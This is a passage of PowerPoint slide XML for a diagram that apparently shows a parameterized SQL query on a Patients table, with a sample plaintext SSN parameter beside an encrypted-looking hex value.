                          <a:pt x="8195" y="31153"/>
                          <a:pt x="12839" y="24319"/>
                          <a:pt x="18580" y="18578"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="24319" y="12839"/>
                          <a:pt x="31152" y="8195"/>
                          <a:pt x="38741" y="4985"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="42536" y="3380"/>
                          <a:pt x="46519" y="2133"/>
                          <a:pt x="50648" y="1289"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="54778" y="444"/>
                          <a:pt x="59053" y="0"/>
                          <a:pt x="63432" y="0"/>
                        </a:cubicBezTo>
                        <a:close/>
                      </a:path>
                    </a:pathLst>
                  </a:custGeom>
                  <a:solidFill>
                    <a:schemeClr val="accent5"/>
                  </a:solidFill>
                  <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr rot="0" spcFirstLastPara="0" vertOverflow="overflow" horzOverflow="overflow" vert="horz" wrap="square" lIns="91377" tIns="45688" rIns="45688" bIns="91377" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="b" anchorCtr="0" forceAA="0" compatLnSpc="1">
                    <a:prstTxWarp prst="textNoShape">
                      <a:avLst/>
                    </a:prstTxWarp>
                    <a:noAutofit/>
                  </a:bodyPr>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="913387" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                      <a:lnSpc>
                        <a:spcPct val="100000"/>
                      </a:lnSpc>
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:buClrTx/>
                      <a:buSzTx/>
                      <a:buFontTx/>
                      <a:buNone/>
                      <a:tabLst/>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr kumimoji="0" lang="en-US" sz="1398" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="-50" normalizeH="0" baseline="0" noProof="0">
                      <a:ln>
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF">
                            <a:alpha val="0"/>
                          </a:srgbClr>
                        </a:solidFill>
                      </a:ln>
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:effectLst/>
                      <a:uLnTx/>
                      <a:uFillTx/>
                      <a:latin typeface="Segoe UI"/>
                      <a:ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
                      <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="160" name="Freeform 159"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="auto">
                  <a:xfrm>
                    <a:off x="1186222" y="2647601"/>
                    <a:ext cx="1251597" cy="826375"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="connsiteX0" fmla="*/ 65139 w 1457489"/>
                      <a:gd name="connsiteY0" fmla="*/ 0 h 962317"/>
                      <a:gd name="connsiteX1" fmla="*/ 1416820 w 1457489"/>
                      <a:gd name="connsiteY1" fmla="*/ 0 h 962317"/>
                      <a:gd name="connsiteX2" fmla="*/ 1442175 w 1457489"/>
                      <a:gd name="connsiteY2" fmla="*/ 5119 h 962317"/>
                      <a:gd name="connsiteX3" fmla="*/ 1457489 w 1457489"/>
                      <a:gd name="connsiteY3" fmla="*/ 15444 h 962317"/>
                      <a:gd name="connsiteX4" fmla="*/ 181174 w 1457489"/>
                      <a:gd name="connsiteY4" fmla="*/ 962317 h 962317"/>
                      <a:gd name="connsiteX5" fmla="*/ 65139 w 1457489"/>
                      <a:gd name="connsiteY5" fmla="*/ 962317 h 962317"/>
                      <a:gd name="connsiteX6" fmla="*/ 0 w 1457489"/>
                      <a:gd name="connsiteY6" fmla="*/ 897178 h 962317"/>
                      <a:gd name="connsiteX7" fmla="*/ 0 w 1457489"/>
                      <a:gd name="connsiteY7" fmla="*/ 65139 h 962317"/>
                      <a:gd name="connsiteX8" fmla="*/ 65139 w 1457489"/>
                      <a:gd name="connsiteY8" fmla="*/ 0 h 96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7489" h="962317">
                        <a:moveTo>
                          <a:pt x="65139" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="1416820" y="0"/>
                        </a:lnTo>
                        <a:cubicBezTo>
                          <a:pt x="1425814" y="0"/>
                          <a:pt x="1434382" y="1823"/>
                          <a:pt x="1442175" y="5119"/>
                        </a:cubicBezTo>
                        <a:lnTo>
                          <a:pt x="1457489" y="15444"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="181174" y="962317"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="65139" y="962317"/>
                        </a:lnTo>
                        <a:cubicBezTo>
                          <a:pt x="29164" y="962317"/>
                          <a:pt x="0" y="933153"/>
                          <a:pt x="0" y="897178"/>
                        </a:cubicBezTo>
                        <a:lnTo>
                          <a:pt x="0" y="65139"/>
                        </a:lnTo>
                        <a:cubicBezTo>
                          <a:pt x="0" y="29164"/>
                          <a:pt x="29164" y="0"/>
                          <a:pt x="65139" y="0"/>
                        </a:cubicBezTo>
                        <a:close/>
                      </a:path>
                    </a:pathLst>
                  </a:custGeom>
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:alpha val="18000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr rot="0" spcFirstLastPara="0" vertOverflow="overflow" horzOverflow="overflow" vert="horz" wrap="square" lIns="91377" tIns="45688" rIns="45688" bIns="91377" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="b" anchorCtr="0" forceAA="0" compatLnSpc="1">
                    <a:prstTxWarp prst="textNoShape">
                      <a:avLst/>
                    </a:prstTxWarp>
                    <a:noAutofit/>
                  </a:bodyPr>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="913387" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                      <a:lnSpc>
                        <a:spcPct val="100000"/>
                      </a:lnSpc>
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:buClrTx/>
                      <a:buSzTx/>
                      <a:buFontTx/>
                      <a:buNone/>
                      <a:tabLst/>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr kumimoji="0" lang="en-US" sz="1398" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="-50" normalizeH="0" baseline="0" noProof="0">
                      <a:ln>
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF">
                            <a:alpha val="0"/>
                          </a:srgbClr>
                        </a:solidFill>
                      </a:ln>
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:effectLst/>
                      <a:uLnTx/>
                      <a:uFillTx/>
                      <a:latin typeface="Segoe UI"/>
                      <a:ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
                      <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
            </p:grpSp>
          </p:grpSp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="141" name="Group 140"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm rot="5400000">
                <a:off x="1940317" y="2232031"/>
                <a:ext cx="227184" cy="606728"/>
                <a:chOff x="2152752" y="2134851"/>
                <a:chExt cx="227184" cy="606728"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:cxnSp>
              <p:nvCxnSpPr>
                <p:cNvPr id="150" name="Straight Connector 149"/>
                <p:cNvCxnSpPr/>
                <p:nvPr/>
              </p:nvCxnSpPr>
              <p:spPr>
                <a:xfrm rot="16200000" flipV="1">
                  <a:off x="2271957" y="2026872"/>
                  <a:ext cx="0" cy="215958"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:ln w="15875">
                  <a:solidFill>
                    <a:srgbClr val="68217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152752" y="2145434"/>
                  <a:ext cx="3345" cy="596145"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:ln w="15875">
                  <a:solidFill>
                    <a:srgbClr val="68217A"/>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1910229" y="2673596"/>
                <a:ext cx="2664814" cy="988873"/>
                <a:chOff x="9864062" y="3145684"/>
                <a:chExt cx="2664814" cy="988873"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="144" name="Rectangle 143"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9905384" y="3145684"/>
                  <a:ext cx="2474220" cy="988873"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ln w="15875">
                  <a:solidFill>
                    <a:srgbClr val="68217A"/>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4" rIns="182780" bIns="146224" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="t" anchorCtr="0" forceAA="0" compatLnSpc="1">
                  <a:prstTxWarp prst="textNoShape">
                    <a:avLst/>
                  </a:prstTxWarp>
                  <a:noAutofit/>
                </a:bodyPr>
                <a:lstStyle/>
                <a:p>
                  <a:pPr marL="342698" marR="0" lvl="0" indent="-342698" algn="ctr" defTabSz="931924"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US"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sp>
              <p:nvSpPr>
                <p:cNvPr id="145" name="TextBox 144"/>
                <p:cNvSpPr txBox="1"/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="9928331" y="3187759"/>
                  <a:ext cx="2600545" cy="553401"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="38100">
                  <a:noFill/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="square">
                  <a:spAutoFit/>
                </a:bodyPr>
                <a:lstStyle>
                  <a:defPPr>
                    <a:defRPr lang="en-US"/>
                  </a:defPPr>
                  <a:lvl1pPr>
                    <a:lnSpc>
                      <a:spcPct val="107000"/>
                    </a:lnSpc>
                    <a:defRPr sz="1200">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                      <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                      <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                    </a:defRPr>
                  </a:lvl1pPr>
                </a:lstStyle>
                <a:p>
                  <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="931316" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                    <a:lnSpc>
                      <a:spcPct val="107000"/>
                    </a:lnSpc>
                    <a:spcBef>
                      <a:spcPts val="0"/>
                    </a:spcBef>
                    <a:spcAft>
                      <a:spcPts val="0"/>
                    </a:spcAft>
                    <a:buClrTx/>
                    <a:buSzTx/>
                    <a:buFontTx/>
                    <a:buNone/>
                    <a:tabLst/>
                    <a:defRPr/>
                  </a:pPr>
                  <a:r>
                    <a:rPr kumimoji="0" lang="en-US" sz="1399" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                      <a:ln>
                        <a:noFill/>
                      </a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                      <a:effectLst/>
                      <a:uLnTx/>
                      <a:uFillTx/>
                      <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                    </a:rPr>
                    <a:t>SELECT Name FROM Patients WHERE SSN=@SSN</a:t>
                  </a:r>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="146" name="TextBox 145"/>
                <p:cNvSpPr txBox="1"/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="9864062" y="3779652"/>
                  <a:ext cx="2639288" cy="311473"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="38100">
                  <a:noFill/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="square">
                  <a:spAutoFit/>
                </a:bodyPr>
                <a:lstStyle>
                  <a:defPPr>
                    <a:defRPr lang="en-US"/>
                  </a:defPPr>
                  <a:lvl1pPr>
                    <a:lnSpc>
                      <a:spcPct val="107000"/>
                    </a:lnSpc>
                    <a:defRPr sz="1200">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                      <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                      <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                    </a:defRPr>
                  </a:lvl1pPr>
                </a:lstStyle>
                <a:p>
                  <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="931316" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                    <a:lnSpc>
                      <a:spcPct val="107000"/>
                    </a:lnSpc>
                    <a:spcBef>
                      <a:spcPts val="0"/>
                    </a:spcBef>
                    <a:spcAft>
                      <a:spcPts val="0"/>
                    </a:spcAft>
                    <a:buClrTx/>
                    <a:buSzTx/>
                    <a:buFontTx/>
                    <a:buNone/>
                    <a:tabLst/>
                    <a:defRPr/>
                  </a:pPr>
                  <a:r>
                    <a:rPr kumimoji="0" lang="en-US" sz="1399" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                      <a:ln>
                        <a:noFill/>
                      </a:ln>
                      <a:solidFill>
                        <a:schemeClr val="accent1">
                          <a:lumMod val="20000"/>
                          <a:lumOff val="80000"/>
                        </a:schemeClr>
                      </a:solidFill>
                      <a:effectLst/>
                      <a:uLnTx/>
                      <a:uFillTx/>
                      <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                    </a:rPr>
                    <a:t>@SSN=‘000-33-0987'</a:t>
                  </a:r>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="161" name="Rectangle 160"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1799219" y="3939199"/>
              <a:ext cx="1248628" cy="47656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39" rIns="0" bIns="47539" numCol="1" rtlCol="0" anchor="b" anchorCtr="0" compatLnSpc="1">
              <a:prstTxWarp prst="textNoShape">
                <a:avLst/>
              </a:prstTxWarp>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="950470" rtl="0"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a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="FF8C00"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Segoe UI"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Result set</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="162" name="Group 161"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="7684041" y="2090102"/>
              <a:ext cx="3659089" cy="1827681"/>
              <a:chOff x="7716442" y="1824332"/>
              <a:chExt cx="3661081" cy="1828675"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="163" name="Group 162"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="8160734" y="1824332"/>
                <a:ext cx="3216789" cy="988873"/>
                <a:chOff x="8160734" y="1824332"/>
                <a:chExt cx="3216789" cy="988873"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="166" name="Group 165"/>
                <p:cNvGrpSpPr/>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr>
                <a:xfrm>
                  <a:off x="8680721" y="1824332"/>
                  <a:ext cx="2696802" cy="988873"/>
                  <a:chOff x="8490581" y="1954958"/>
                  <a:chExt cx="2696802" cy="988873"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="172" name="Rectangle 171"/>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="auto">
                  <a:xfrm>
                    <a:off x="8578406" y="1954958"/>
                    <a:ext cx="2474220" cy="988873"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:ln w="15875">
                    <a:solidFill>
                      <a:srgbClr val="68217A"/>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4" rIns="182780" bIns="146224" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="t" anchorCtr="0" forceAA="0" compatLnSpc="1">
                    <a:prstTxWarp prst="textNoShape">
                      <a:avLst/>
                    </a:prstTxWarp>
                    <a:noAutofit/>
                  </a:bodyPr>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr marL="342698" marR="0" lvl="0" indent="-342698" algn="ctr" defTabSz="931924"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US" sz="1999" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                      <a:ln>
                        <a:noFill/>
                      </a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                      <a:effectLst/>
                      <a:uLnTx/>
                      <a:uFillTx/>
                      <a:latin typeface="Segoe UI Light"/>
                      <a:ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
                      <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="177" name="TextBox 176"/>
                  <p:cNvSpPr txBox="1"/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="8586838" y="1981267"/>
                    <a:ext cx="2600545" cy="553401"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:noFill/>
                  <a:ln w="38100">
                    <a:noFill/>
                  </a:ln>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr wrap="square">
                    <a:spAutoFit/>
                  </a:bodyPr>
                  <a:lstStyle>
                    <a:defPPr>
                      <a:defRPr lang="en-US"/>
                    </a:defPPr>
                    <a:lvl1pPr>
                      <a:lnSpc>
                        <a:spcPct val="107000"/>
                      </a:lnSpc>
                      <a:defRPr sz="1200">
                        <a:solidFill>
                          <a:srgbClr val="0000FF"/>
                        </a:solidFill>
                        <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                      </a:defRPr>
                    </a:lvl1pPr>
                  </a:lstStyle>
                  <a:p>
                    <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="931316" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                      <a:lnSpc>
                        <a:spcPct val="107000"/>
                      </a:lnSpc>
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:buClrTx/>
                      <a:buSzTx/>
                      <a:buFontTx/>
                      <a:buNone/>
                      <a:tabLst/>
                      <a:defRPr/>
                    </a:pPr>
                    <a:r>
                      <a:rPr kumimoji="0" lang="en-US" sz="1399" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:uLnTx/>
                        <a:uFillTx/>
                        <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                      </a:rPr>
                      <a:t>SELECT Name FROM Patients WHERE SSN=@SSN</a:t>
                    </a:r>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="179" name="TextBox 178"/>
                  <p:cNvSpPr txBox="1"/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="8490581" y="2592327"/>
                    <a:ext cx="2639288" cy="322893"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:noFill/>
                  <a:ln w="38100">
                    <a:noFill/>
                  </a:ln>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr wrap="square">
                    <a:spAutoFit/>
                  </a:bodyPr>
                  <a:lstStyle>
                    <a:defPPr>
                      <a:defRPr lang="en-US"/>
                    </a:defPPr>
                    <a:lvl1pPr>
                      <a:lnSpc>
                        <a:spcPct val="107000"/>
                      </a:lnSpc>
                      <a:defRPr sz="1200">
                        <a:solidFill>
                          <a:srgbClr val="0000FF"/>
                        </a:solidFill>
                        <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                      </a:defRPr>
                    </a:lvl1pPr>
                  </a:lstStyle>
                  <a:p>
                    <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="931316" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                      <a:lnSpc>
                        <a:spcPct val="107000"/>
                      </a:lnSpc>
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:buClrTx/>
                      <a:buSzTx/>
                      <a:buFontTx/>
                      <a:buNone/>
                      <a:tabLst/>
                      <a:defRPr/>
                    </a:pPr>
                    <a:r>
                      <a:rPr kumimoji="0" lang="en-US" sz="1399" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:uLnTx/>
                        <a:uFillTx/>
                        <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                      </a:rPr>
                      <a:t>@SSN=</a:t>
                    </a:r>
                    <a:r>
                      <a:rPr kumimoji="0" lang="en-US" sz="1399" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:uLnTx/>
                        <a:uFillTx/>
                        <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                      </a:rPr>
                      <a:t>0x7ff654ae6d</a:t>
                    </a:r>
                  </a:p>
                </p:txBody>
              </p:sp>
            </p:grpSp>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="168" name="Group 167"/>
                <p:cNvGrpSpPr/>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr>
                <a:xfrm>
                  <a:off x="8160734" y="2257288"/>
                  <a:ext cx="554906" cy="334577"/>
                  <a:chOff x="8146220" y="2387914"/>
                  <a:chExt cx="554906" cy="334577"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:cxnSp>
                <p:nvCxnSpPr>
                  <p:cNvPr id="170" name="Straight Connector 169"/>
                  <p:cNvCxnSpPr/>
                  <p:nvPr/>
                </p:nvCxnSpPr>
                <p:spPr>
                  <a:xfrm rot="5400000">
                    <a:off x="8423673" y="2110461"/>
                    <a:ext cx="0" cy="554906"/>
                  </a:xfrm>
                  <a:prstGeom prst="line">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:ln w="15875">
                    <a:solidFill>
                      <a:srgbClr val="68217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152579" y="2398496"/>
                    <a:ext cx="0" cy="323995"/>
                  </a:xfrm>
                  <a:prstGeom prst="line">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:ln w="15875">
                    <a:solidFill>
                      <a:srgbClr val="68217A"/>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64" name="Oval 163"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7730521" y="2584312"/>
                <a:ext cx="794803" cy="151025"/>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8" rIns="91377" bIns="45688" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
                <a:prstTxWarp prst="textNoShape">
                  <a:avLst/>
                </a:prstTxWarp>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="932049"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effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Segoe UI"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="165" name="Freeform 123"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7716442" y="2689264"/>
                <a:ext cx="822960" cy="963743"/>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8" rIns="91377" bIns="45688" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
                <a:prstTxWarp prst="textNoShape">
                  <a:avLst/>
                </a:prstTxWarp>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="932049"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effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Segoe UI"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="2" name="Group 1">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{729A5F6F-AE13-4089-90BA-F0154D058EA5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="10604500" y="3828735"/>
              <a:ext cx="1180816" cy="816318"/>
              <a:chOff x="10604500" y="3828735"/>
              <a:chExt cx="1180816" cy="816318"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="182" name="TextBox 181"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="10604500" y="4201835"/>
                <a:ext cx="1180816" cy="443218"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" lIns="182755" tIns="146203" rIns="182755" bIns="146203" rtlCol="0">
                <a:noAutofit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="r" defTabSz="931136" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                  <a:lnSpc>
                    <a:spcPct val="90000"/>
